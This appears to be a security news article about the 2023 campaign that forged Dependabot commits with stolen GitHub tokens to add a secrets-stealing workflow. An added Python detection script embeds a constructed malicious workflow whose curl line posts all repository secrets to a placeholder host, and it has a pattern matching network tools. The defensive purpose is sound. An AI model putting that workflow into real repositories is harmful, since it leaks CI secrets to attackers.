This campaign took place in July 2023 when researchers noticed unusual commits on numerous public and private repositories. These commits were cleverly crafted to appear as Dependabot commits.
Dependabot is an automated tool provided by GitHub that scans projects for vulnerable dependencies and automatically generates pull requests to update them.
According to a report by Checkmarx, the fake Dependabot contributions were made possible through stolen GitHub access tokens. The attackers' goal was to inject malicious code into the projects in order to exfiltrate those projects' secrets.
Impersonating GitHub’s Dependabot
The attack began with the hackers somehow acquiring the personal GitHub access tokens of their targets, but Checkmarx does not have insight into how this was done.
The threat actors then used automated scripts to push commits with the message "fix" whose author field was set to "dependabot[bot]", so that in the repository history they appeared to come from GitHub's own bot rather than from the compromised account whose token was used to push them.
These fraudulent commits introduced malicious code into the project, performing the following actions:
- Extracting secrets from the targeted GitHub project and sending them to the attacker’s command and control server.
The secrets extraction is accomplished by committing a new GitHub Actions workflow file, "hook.yml", under the repository's .github/workflows/ directory. The workflow is triggered on every push event to the affected repository, so the repository's secrets are exposed to the attacker's workflow each time anyone pushes code.
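As an added illustration, not code from the Checkmarx report or from this page: a Python script applying two checks a repository owner could run after a campaign like this one. It parses the output of `git log --format='%H|%an|%ae|%s' --name-only` for commits that claim the "dependabot[bot]" author but deviate from Dependabot's conventions, and it audits a workflow file for the push-triggered, secrets-dumping, outbound-calling pattern described above. The git log, the hook.yml-style workflow and the benign workflow are constructed samples; the Dependabot noreply author address and subject-line format used as a baseline are assumptions that should be verified against a genuine Dependabot commit before relying on them.

```python
import re

DEPENDABOT_NAME = "dependabot[bot]"
# Assumption: the noreply address GitHub's own Dependabot uses as commit author.
# Verify it against a genuine Dependabot commit in your organisation.
DEPENDABOT_EMAIL = "49699333+dependabot[bot]@users.noreply.github.com"
# Heuristic: genuine Dependabot subjects read "Bump X from A to B" (optionally
# prefixed, e.g. "build(deps): bump ...") or "Update X requirement ...".
DEPENDABOT_SUBJECT = re.compile(r"^(?:[\w()\-/ ]+:\s*)?(?:bump|update)\b", re.IGNORECASE)
WORKFLOW_DIR = ".github/workflows/"

# Constructed sample of `git log --format='%H|%an|%ae|%s' --name-only` output:
# one genuine-looking Dependabot bump and one commit shaped like the campaign's.
SAMPLE_GIT_LOG = """\
1111111111111111111111111111111111111111|dependabot[bot]|49699333+dependabot[bot]@users.noreply.github.com|Bump lodash from 4.17.20 to 4.17.21

package.json
package-lock.json

2222222222222222222222222222222222222222|dependabot[bot]|dev@example.com|fix

.github/workflows/hook.yml
"""

# Constructed workflow modelled on the page's description of hook.yml: it runs
# on every push, dumps the whole secrets context and posts it to a remote host.
SAMPLE_WORKFLOW = """\
name: hook
on: push
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - run: curl -s -d "${{ toJSON(secrets) }}" https://example.invalid/collect
"""

# Constructed benign workflow for comparison.
BENIGN_WORKFLOW = """\
name: ci
on:
  pull_request:
    branches: [main]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm test
"""


def parse_git_log(text):
    """Parse `git log --format='%H|%an|%ae|%s' --name-only` output into commit dicts."""
    commits = []
    for ln in text.splitlines():
        if not ln.strip():
            continue
        if re.match(r"^[0-9a-f]{40}\|", ln):
            sha, name, email, subject = ln.split("|", 3)
            commits.append({"sha": sha, "author": name, "email": email,
                            "subject": subject, "files": []})
        elif commits:
            commits[-1]["files"].append(ln.strip())
    return commits


def suspicious_dependabot_commits(commits):
    """Return [(sha, [reasons])] for commits that claim Dependabot authorship but look forged."""
    flagged = []
    for c in commits:
        if c["author"].lower() != DEPENDABOT_NAME:
            continue
        anomalies = []
        if c["email"].lower() != DEPENDABOT_EMAIL:
            anomalies.append(f"author email {c['email']} is not Dependabot's")
        if not DEPENDABOT_SUBJECT.match(c["subject"]):
            anomalies.append(f"subject {c['subject']!r} does not follow Dependabot's convention")
        workflows = [f for f in c["files"] if f.startswith(WORKFLOW_DIR)]
        # Dependabot legitimately bumps action versions inside workflows, so a
        # workflow touch only adds weight once another anomaly is present.
        if anomalies:
            if workflows:
                anomalies.append(f"adds/modifies workflow files: {', '.join(workflows)}")
            flagged.append((c["sha"], anomalies))
    return flagged


def _push_triggered(workflow_text):
    """True if the workflow's `on:` trigger includes push (inline or block form)."""
    lines = workflow_text.splitlines()
    for i, ln in enumerate(lines):
        m = re.match(r"^on:\s*(.*)$", ln)
        if not m:
            continue
        inline = m.group(1).strip()
        if inline:
            return "push" in inline
        for nxt in lines[i + 1:]:
            if nxt and not nxt[0].isspace():
                break
            if nxt.strip().startswith("push"):
                return True
        return False
    return False


def _run_script_lines(workflow_text):
    """Yield the shell lines of every `run:` step, including `run: |` blocks."""
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = re.match(r"^(\s*)-?\s*run:\s*(.*)$", lines[i])
        i += 1
        if not m:
            continue
        indent, rest = len(m.group(1)), m.group(2).strip()
        if rest not in ("|", ">", "|-", ">-"):
            yield rest
            continue
        while i < len(lines) and (not lines[i].strip()
                                  or len(lines[i]) - len(lines[i].lstrip()) > indent):
            yield lines[i].strip()
            i += 1


def audit_workflow(workflow_text):
    """Return findings for a workflow that runs on push, dumps all secrets and calls out."""
    findings = []
    if _push_triggered(workflow_text):
        findings.append("triggered on push")
    if re.search(r"tojson\s*\(\s*secrets\s*\)", workflow_text, re.IGNORECASE):
        findings.append("dumps the entire secrets context with toJSON(secrets)")
    if any(re.search(r"\b(curl|wget|nc|Invoke-WebRequest)\b", ln)
           for ln in _run_script_lines(workflow_text)):
        findings.append("run step makes outbound network calls")
    return findings


if __name__ == "__main__":
    for sha, reasons in suspicious_dependabot_commits(parse_git_log(SAMPLE_GIT_LOG)):
        print(sha[:12], "->", "; ".join(reasons))
    print("hook.yml-style workflow:", audit_workflow(SAMPLE_WORKFLOW))
    print("benign workflow:", audit_workflow(BENIGN_WORKFLOW))
```

The commit check is a heuristic, not proof: an attacker who copies Dependabot's exact author address and subject format passes it, so the workflow audit is the stronger signal. Any workflow that both reads `toJSON(secrets)` and calls out to the network from a push trigger deserves a manual look regardless of who appears to have committed it.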
Since many compromised tokens also provided access to private repositories, both public and private GitHub repositories were affected by this attack.
Possible compromise points
Checkmarx’s analysts examined the logs from some victims and discovered that their accounts were compromised through stolen PATs (personal access tokens).
These tokens are typically stored locally on developers' machines (for example in a git credential helper) and authenticate git and API operations directly, so whoever holds the token can act as the user without going through the 2FA (two-factor authentication) challenge that protects the interactive login.
“Unfortunately, the token’s access log activity does not appear in the account’s audit log. Therefore, if your token has been compromised, you cannot be certain as the access logs are missing,” warns Checkmarx.
Although the cybersecurity firm has not reached a definitive conclusion regarding the exact means by which the attackers stole these tokens, they speculate that it might have been through a malware infection, possibly introduced to the developers’ devices via a malicious package.
Most of the compromised users are from Indonesia, suggesting a targeted attack tailored to this demographic. However, the available evidence does not provide specific details about the motive.
A suggested measure to protect against these attacks is to switch to GitHub's fine-grained personal access tokens, which are scoped to selected repositories and specific permissions, so that a stolen token gives an attacker far less to work with than a classic token with broad repository access.